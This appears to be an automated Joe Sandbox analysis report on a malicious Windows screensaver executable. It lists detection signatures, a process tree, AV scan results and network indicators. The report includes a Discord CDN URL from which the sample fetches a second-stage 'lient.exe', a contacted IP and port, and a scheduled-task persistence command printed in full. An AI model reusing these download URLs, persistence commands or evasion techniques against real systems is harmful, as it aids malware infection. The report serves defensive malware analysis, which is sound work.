Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe

Overview

General Information

Sample Name:#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Original Sample Name:_.scr.exe
Analysis ID:1331098
MD5:d88092aabd3af3ba4ef626c31962626e
SHA1:95235b832c708dbf13bd7697de37c81ef70ab2b5
SHA256:12dcbc603c08faaf1fba0596ebd8bea58713f313540730109957514747be1bac
Tags:exekeygroupWorm
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Detected VMProtect packer
Creates multiple autostart registry keys
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Machine Learning detection for sample
.NET source code contains potential unpacker
Creates autostart registry keys with suspicious values (likely registry only malware)
Machine Learning detection for dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe (PID: 6620 cmdline: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe MD5: D88092AABD3AF3BA4EF626C31962626E)
    • fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (PID: 1476 cmdline: "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S MD5: 2F621D531B27FF6BCF35DB5412A879BF)
      • schtasks.exe (PID: 7192 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 8088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S MD5: 2F621D531B27FF6BCF35DB5412A879BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for domain / URL
Source: ideas-teams.at.ply.ggVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrVirustotal: Detection: 51%Perma Link
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrVirustotal: Detection: 51%Perma Link
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scrReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrVirustotal: Detection: 51%Perma Link
Machine Learning detection for sample
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeJoe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scrJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrJoe Sandbox ML: detected
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49714 version: TLS 1.0
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Deployment.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb4v source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb$0<2a@ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb0_ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Windows.Forms.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb< source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb| source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\Jump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49714 version: TLS 1.0
Source: unknownDNS query: name: ip-api.com
Source: global trafficTCP traffic: 192.168.2.5:49716 -> 209.25.140.229:54323
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, wininit.scr.0.drString found in binary or memory: http://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, wininit.scr.0.drString found in binary or memory: http://www.whatsmyip.us/showipsimple.php
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
Source: global trafficHTTP traffic detected: GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

System Summary

barindex
Detected VMProtect packer
Source: wininit.scr.0.drStatic PE information: .vmp0 and .vmp1 section names
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_014488100_2_01448810
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144C3400_2_0144C340
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144DA680_2_0144DA68
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144CA100_2_0144CA10
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144F2A80_2_0144F2A8
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_01440C900_2_01440C90
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_014496900_2_01449690
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144B9330_2_0144B933
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144F80F0_2_0144F80F
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144B3180_2_0144B318
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144CA010_2_0144CA01
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_01440A600_2_01440A60
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_01440C800_2_01440C80
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144B7080_2_0144B708
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144BFD70_2_0144BFD7
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144B7850_2_0144B785
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144E62A0_2_0144E62A
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD0BE80_2_02DD0BE8
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDCB100_2_02DDCB10
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD69000_2_02DD6900
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDB9040_2_02DDB904
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD1D400_2_02DD1D40
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD617E0_2_02DD617E
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD0BD90_2_02DD0BD9
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD68F40_2_02DD68F4
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD2E080_2_02DD2E08
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD2DF80_2_02DD2DF8
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD6D900_2_02DD6D90
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD6DA00_2_02DD6DA0
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD33800_2_02DD3380
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD57180_2_02DD5718
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD35970_2_02DD3597
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDBA500_2_02DDBA50
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDBA400_2_02DDBA40
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD3BC90_2_02DD3BC9
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDB8F80_2_02DDB8F8
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DDD8700_2_02DDD870
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD39950_2_02DD3995
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD5FD50_2_02DD5FD5
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_02DD5DF80_2_02DD5DF8
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_09AC9CA00_2_09AC9CA0
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_09ACB0480_2_09ACB048
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483599672_2_00007FF848359967
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483576322_2_00007FF848357632
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483523012_2_00007FF848352301
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483508552_2_00007FF848350855
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483568862_2_00007FF848356886
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 2_2_00007FF8483563892_2_00007FF848356389
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 7_2_00007FF8483707157_2_00007FF848370715
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 7_2_00007FF8483707E07_2_00007FF8483707E0
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 8_2_00007FF8483707158_2_00007FF848370715
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 8_2_00007FF8483707E08_2_00007FF8483707E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 9_2_00007FF8483607159_2_00007FF848360715
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrCode function: 9_2_00007FF8483607E09_2_00007FF8483607E0
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144F030 NtQueryInformationProcess,0_2_0144F030
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144EFC9 NtQueryInformationProcess,0_2_0144EFC9
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeCode function: 0_2_0144EFF0 NtQueryInformationProcess,0_2_0144EFF0
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2720682283.0000000000F88000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2720578515.0000000000B8B000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVMProtect.Runtime.dllD vs #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
